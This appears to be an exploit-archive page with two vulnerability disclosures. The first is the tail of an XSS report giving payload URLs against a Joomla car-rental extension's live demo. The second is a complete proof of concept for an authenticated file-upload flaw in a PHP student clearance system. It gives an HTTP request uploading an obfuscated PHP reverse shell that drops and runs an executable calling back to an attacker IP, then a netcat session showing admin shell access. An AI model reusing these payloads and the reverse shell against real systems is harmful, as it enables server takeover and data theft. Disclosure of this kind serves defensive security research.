variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />parameter 'returnplace' is vulnerable to XSS<br /><br />Path: index.php/en/search-your-car<br /> <br />https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continue<br /><br /><br /><br />parameter 'categories' is vulnerable to XSS<br /><br />Path: index.php/en/search-your-car<br /><br />https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload<br />leads to Remote Code Execution (Authenticated)<br /># Date: 08-10-2022<br /># Exploit Author: Akash Pandey ( L3V1ATH0N )<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html<br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code<br /># Version: v1.0<br /># Tested on: Windows, XAMPP, Kali Linux<br /># CVE :<br /><br />----- POC -----<br /><br />Note : The reverse shell below is for Windows based PHP reverse shell.<br />If the target host is using Linux then the Linux based PHP reverse shell<br />must be used.<br /><br />---------------<br /><br />Request : URL -<br />http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />=========<br /><br />POST<br />/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />HTTP/1.1<br />Host: 192.168.1.12<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------71268058833541201443517047173<br />Content-Length: 6864<br />Origin: http://192.168.1.12<br />Connection: close<br />Referer:<br />http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------71268058833541201443517047173<br /><br />Content-Disposition: form-data; name="userImage"; filename="shell.php"<br />Content-Type: application/x-php<br /><br /><?php<br /><br />header('Content-type: text/plain');<br />$ip = "192.168.1.26"; //change this<br />$port = "80"; //change this<br />$payload =<br />"7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQALgAvBEO8D+LBlWqcx0VqLK+4XIBw7vhEr9VooKylIoMpVAGpQnlcgUMpYohpVoOSeRQSHQcJFOIxB42NiT22xoxoQDAw+CAH1KaY/9dtw+g4cgYrAMAoQEd1ZPopwG1lai2v13dDI59s27M2/W/TX4zhwru9Qi9jem/4fTfbwKt54cB/mPZagIA5n+QlxCT5PnaOfm7BWH/cn37UJ7Xv7fxev+z/srjvOF5/7a59rccu7/wTD4enitmvtzFxhprXWZ0rHvn3Z0jVw8CQCEVZbgBwCIACBhqQ5A47ZBfeQSHAxSZYNa1EDYRIIDY6p7xKZBNRdrZFDKdsWhgWF7TTaW3gQTrZJAUYHCfCBjvctfh6OWAJ2clIOCA+My6kdq5XGeKqxuRW9f10cvkcqZAGaR32rvd+nNwlW5jf6ZCH0zX+c8X2V52wbV4xoBS/a2R+nP2XDqFfFHbPzabyoKHbB406JcRj/qVH/afPHd5GLfBPH+njrX2ngFeBChqqmU0N72r53JM4H57U07gevzjnkADXhlVj5kNEHeokIzlhdpJDK3wuc0tWtFJwiNpzWUvk7bJbXOjmyE7+CAcGXj4Vq/iFd4x8IC613I+0IoWFOh0qxjnLUgAYYnLcL3N+W/tCi8ggKXCq2vwNK6+8ilmiaHKSPZXdKrq1+0tVHkyV/tH1O2/FHtxVgHmccSpoZa5ZCO9O3V3P6aoKyn/n69K535eDrNc9UQfmDw6aqiuNFx0xctZ+zBD7SOT9oXWA5kvfUqcLxkjF2Ejy49W7jc/skP6dOM0oxFIfzI6qbehMItaYb8E3U/NzAtnH7cCnO7YlAUmKuOWukuwvn8B0cHa1a9nZJS8oNVsvJBkGTRyt5jjDJM5OVU87zRk+zQjcUPcewVDSbhr9dcG+q+rDd+1fVYJ1NEnHYcKkQnd7WdfGYoga/C6RF7vlEEEvdTgT6uwxAQM5c4xxk07Ap3yrfUBLREvDzdPdI0k39eF1nzQD+SR6BSxed1mCWHCRWByfej33WjX3vQFj66FVibo8bb1TkNmf0NoE/tguksTNnlYPLsfsANbaDUBNTmndixgsCKb9QmV4f2667Z1n8QbEprwIIfIpoh/HnqXyfJy/+SnobFax1wSy8tXWV30MTG1UlLVKPbBBUz29QEB33o2tiVytuBmpZzsp+JEW7yre76w1XOIxA4WcURWIQwOuRd0D1D3s1zYxr6yqp8beopn30tPIdEut1sTj+5gdlNSGHFs/cKD6fTGo1WV5MeBOdV5/xCHpy+WFvLO5ZX5saMyZrnN9mUzKht+IsbT54QYF7mX1j7rfnnJZkjm72BJuUb3LCKyMJiRh23fktIpRF2RHWmszSWNyGSlQ1HKwc9jW6ZX3xa693c8b1UvcpAvV84NanvJPmb9ws+1HrrKAphe9MaUCDyGUPxx+osUevG0W3D6vhun9AX2DJD+nXlua7tLnFX197wDTIqn/wcX/4nEG8RjGzen8LcYhNP3kYXtkBa28TMS2ga0FO+WoY7uMdRA9/r7drdA2udNc7d6U7C39NtH7QvGR1ecwsH0Cxi7JlYjhf3A3J76iz5+4dm9fUxwqLOKdtF1jW0Nj7ehsiLQ7f6P/CE+NgkmXbOieExi4Vkjm6Q7KEF+dpyRNQ12mktNSI9zwYjVlVfYovFdj2P14DHhZf0I7TB22IxZ+Uw95Lt+xWmPzW7zThCb2prMRywnBz4a5o+bplyAo0eTdI3vOtY0TY1DQMwx0jGv9r+T53zhnjqii4yjffa3TyjbRJaGHup48xmC1obViCFrVu/uWY2daHTSAFQQwLww7g8mYukFP063rq4AofErizmanyC1R8+UzLldkxmIz3bKsynaVbJz6E7ufD8OTCoI2fzMXOa67BZFA1iajQDmTnt50cverieja4yEOWV3R32THM9+1EDfyNElsyN5gVfa8xzm0CsKE/Wjg3hPR/A0WDUQ1CP2oiVzebW7RuG6FPYZzzUw+7wFMdg/0O1kx+tu6aTspFkMu0u3Py1OrdvsRwXVS3qIAQ/nE919fPTv6TusHqoD9P56vxfJ5uyaD8hLl1HbDxocoXjsRxCfouJkibeYUlQMOn+TP62rI6P6kHIewXmbxtl59BxMbt6Hn7c7NL7r0LfiF/FfkTFP1z7UF9gOjYqOP694ReKlG8uhCILZ4cLk2Louy9ylYDaB5GSpk03l7upb584gR0DH2adCBgMvutH29dq9626VPPCPGpciG6fpLvUOP4Cb6UC9VA9yA9fU1i+m5Vdd6SaOFYVjblJqhq/1FkzZ0bTaS9VxV1UmstZ8s3b8V7qhmOa+3Klw39p5h/cP/woRx4hVQfHLQV7ijTbFfRqy0T0jSeWhjwNrQeRDY9fqtJiPcbZ5xED4xAdnMnHep5cq7+h79RkGq7v6q+5Hztve262b260+c9h61a6Jpb+ElkPVa9Mnax7k4Qu+Hzk/tU+ALP6+Frut4L8wvwqXOIaVMZmDCsrKJwU91e/13gGfet8EPgZ8eoaeLvXH+JpXLR8vuALdasb5sXZVPKZ7Qv+8X0qYKPCNLid6Xn7s92DbPufW/GMMQ4ylT3YhU2RP3jZoIWsTJJQvLzOb4KmixmIXZAohtsI0xO4Ybd9QtpMFc0r9i+SkE/biRFTNo+XMzeaXFmx0MEZvV+T2DvOL4iVjg0hnqSF5DVuA58eyHQvO+yIH82Op3dkiTwGDvTOClHbC54L6/aVn9bhshq5Zntv6gbVv5YFxmGjU+bLlJv9Ht/Wbidvvhwa4DwswuF155mXl7pcsF8z2VUyv8Qa7QKpuTN//d9xDa73tLPNsyuCD449KMy4uvAOH80+H+nds0OGSlF+0yc4pyit0X80iynZmCc7YbKELGsKlRFreHr5RYkdi1u0hBDWHIM7eLlj7O/A8PXZlh5phiVzhtpMYTVzZ+f0sfdCTpO/riIG/POPpI3qonVcE636lNy2w/EBnz7Os+ry23dIVLWyxzf8pRDkrdsvZ7HMeDl9LthIXqftePPJpi25lABtDHg1VWK5Gu7vOW9fBDzRFw2WWAMuBo6Xbxym8Fsf9l0SV3AZC7kGCxsjFz95ZcgEdRSerKtHRePpiaQVquF8KOOiI58XEz3BCfD1nOFnSrTOcAFFE8sysXxJ05HiqTNSd5W57YvBJU+vSqKStAMKxP+gLmOaOafL3FLpwKjGAuGgDsmYPSSpJzUjbttTLx0MkvfwCQaQAf102P1acIVHBYmWwVKhSiVWpPit8M6GfEQRRbRVLpZA/lKaQy8VpsFhEIgHB0VFxMaHB6CxiYnKAKIk8I2fmNAtLZGIoXSiRqpVifxIAQRskNQ6bXylhtVD6njqPGYhXKL/rqrkOLUzNW6eChDBWJFo63lv7zXbbrPU+CfJMuSJHDmUVjshrxtUixYYPFGmLJAqGUgHXX5J1kRV7s9er6GEeJJ/5NdluqRLhkvfFhs+whf0Qzspoa7d/4ysE834sgNlJxMylgGAJxi3f8fkWWd9lBKEAXCpRiw2mgjLVBCeV6mvFowZg7+E17kdu5iyJaDKlSevypzyxoSRrrpkKhpHpC6T0xs6p6hr7rHmQrSbDdlnSXcpBN8IR2/AkTtmX7BqWzDgMlV6LC04oOjVYNw5GkAUg1c85oOWTkeHOYuDrYixI0eIWiyhhGxtT6sznm4PJmTa7bQqkvbn8lt044Oxj890l3VtssRWUIGuBliVcQf8yrb1NgGMu2Ts7m1+pyXliaZ9LxRQtm2YQBCFaq43F+t24sKJPh3dN9lDjGTDp6rVms5OEGkPDxnZSs0vwmZaTrWvuOdW/HJZuiNaCxbjdTU9IvkHkjVRv4xE7znX3qLvvTq+n0pMLIEffpLXVV/wE5yHZO9wEuojBm3BeUBicsdBXS/HLFdxyv5694BRrrVVM8LYbH7rvDb7D3V1tE3Z31dG9S9YGhPlf71g+/h6peY/K573Q0EjfHutRkrnZdrPR/Nx4c/6NgpjgXPn+1AM3lPabaJuLtO717TkhbaVJpCLp8vFPQyE+OdkdwGws2WN78WNC/ADMUS/EtRyKKUmvPSrFTW8nKVllpyRlvrxNcGGpDHW/utgxRlWpM47cXIbzWK0KjyeI7vpG3cXBHx48fioKdSsvNt180JeNugNPp/G9dHiw7Mp6FuEdP1wYWuhUTFJ6libBKCsrMZbB142LSypxWdAyEdoHZLmsqrQC3GieGkZHQBZOFhLxmeacNRRfn8UEEw6BSDv3/svZRg7AwtklaCK5QBKOUrB3DzG/k8Ut9RRigqUKlRh83jsdIZSLpGKlWAiLY5SKNOT6cPV+Li1EbA+LJbAkTSiNE6dV9/A4cQ6hcjulfbVVZmIu3Z8SvqJHrqhZmC2hymXipRuE7sLUjurA6kgukydUsZRzlDbPb3z4MkohUksLnEO4yPiQlX1EHLwaVmetlacrDvUkqyB8Trbk/U/GZeIu3qVseyKcIN/K//lV9XLR58ezHMIkUjMLq1wxES9VCU9I1a9ivB/eOJMPB9CqZDWODTaJwqSwqjjyyDdWw2ujU7fND/+iq/qlby6fnxEumy//OkMb1dGgomZhxRib9B07XlTLBsVuKr4wiwHnZdFqb8z+Yb8f4VCq1ZK2R6c9qAs9/eAfRmYn00uZBIXESp6YMtAnXQhg0uen5zzvTe7PIcjEsrSsvNUElSRD3unww3WhNDs9CypOP1sp7Rr/W1NiHDeOk7mQa1cfVG5zpy246x2pU531eShXlba8dkLYsCNVIhd5qwJmJTukgw4dGVsV2Z2b6lPztu86tVUuxePD25Uq6SZi/srizBWcgzGhPAwR7Z/5GkFLc2z7TOdM9if/6ADM0mFNQ9IQPpl+2JO8ec78bsd7GDAgT36LepLCyVqCAyCC8s4KkM6lZ3Xi13kctDIuZ+JalYDn9jaPD2UllObdJQzj4yLyVC+4QOAk8BANRN5eIRWen8JWOAwNyVyYJg+l2yTdEN3a6crkeIi3FnRAPUXKspM4Vcwc15YJHi5VrTULwkp3OmpyJMFZo5iKwRP4ecGx8X40QcYB5gm2KyxVHaI8DYCMi7Yyxi7NBQoYbzpVNoC87VkFDfaVHMDQYOEjSKL2BmKhG1/LHnxYCSEc06Um6OdpR6YZXcrhCzNt/O8QhgnTpRpVW78NVf1erdoBnNLmSh8RzdaOITCsu/p7fusfAjXE/dPkH4ppr2ALXgLPEER7G2OwW6Z9OZ1N24MNQhe1Vj0xmIY+MYx6rLYR1BG010DtIJjzC+bWIA+FU3QTtTvRle4hhLsPBGByJjRrAPVTPWEPH0y/MkC8YqIXNy2e1FgGMGMzuVYlHT92GhoAIwDoCdYmOEDPBw2FnoAJ3euzGO01InJYhPqH0HJEE9yte5EY8fRMAnJ45sUESifocFozaHmMHM5FAf0ZKTqi1cYQpH7mVUFM/DYwLhG5b9h9Ar16GihfI3DLT4qJj5kBkwzHZ4iG+rVoUqKX6auNa2O2YeKQ20JDCFuzDVjZpP5VO6QZ9ItFEMucDQ2ghgNMf1Nkgm224TYiMJv+469Iu2UkpZGCljZxAC2qdoI39ncSYeIA/y//C6S0HQBE7X/EvkBjzZ+wSjQu+RNWj8bG9v++bjOK30O1H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApspOU8LoMU4KJMZ581H0jRsdHPmWAfAUQhFPkqoUKvO4ABAuhmeeT1yRSClWqQBgg+T10QzFYPRo91vMlUoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zoHVuRlimG0dozN+f/O7/5vwA=";<br />$evalCode = gzinflate(base64_decode($payload));<br />$evalArguments = " ".$port." ".$ip;<br />$tmpdir ="C:\\windows\\temp";<br />chdir($tmpdir);<br />$res .= "Using dir : ".$tmpdir;<br />$filename = "D3fa1t_shell.exe";<br />$file = fopen($filename, 'wb');<br />fwrite($file, $evalCode);<br />fclose($file);<br />$path = $filename;<br />$cmd = $path.$evalArguments;<br />$res .= "\n\nExecuting : ".$cmd."\n";<br />echo $res;<br />$output = system($cmd);<br /><br />?><br /><br />-----------------------------71268058833541201443517047173<br /><br />Content-Disposition: form-data; name="btnedit"<br /><br />-----------------------------71268058833541201443517047173--<br /><br /><br />=========================================<br />End of Request<br />=========================================<br /><br />Response:<br />========<br /><br />HTTP/1.1 302 Found<br />Date: Sat, 08 Oct 2022 09:30:51 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: edit-photo.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 8575<br /><br />========================================<br />End of Response<br />========================================<br /><br /><br />The Reverse Shell is located at below URL<br />-----------------------------------------<br /><br />Request: URL -<br />http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php<br />========<br /><br />GET<br />/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php<br />HTTP/1.1<br />Host: 192.168.1.12<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept: image/webp,*/*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer:<br />http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm<br /><br />========================================<br />End of Request<br />========================================<br /><br />Response:<br />=========<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 08 Oct 2022 09:32:16 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Content-Length: 268<br />Connection: close<br />Content-Type: text/plain;charset=UTF-8<br /><br /><br /><br /><b>Notice</b>: Undefined variable: res in<br /><b>C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php</b><br />on line <b>12</b><br /><br />Using dir : C:\windows\temp<br /><br />Executing : D3fa1t_shell.exe 80 192.168.1.26<br /><br />========================================<br />End of Response<br />========================================<br /><br />After uploading the reverse shell file you will get the reverse shell<br />normally. If you don't get reverse shell then locate to 'uploads' folder.<br /><br />Reverse Shell Remotely:<br />======================<br /><br />┌──(kali㉿kali)-[~]<br />└─$ rlwrap nc -lvnp 80<br />listening on [any] 80 ...<br />connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168<br />b374k shell : connected<br /><br />Microsoft Windows [Version 10.0.19043.2006]<br />(c) Microsoft Corporation. All rights reserved.<br /><br />whoami<br />whoami<br />l3v1ath0n\admin<br /><br />C:\Windows\Temp><br /></code></pre>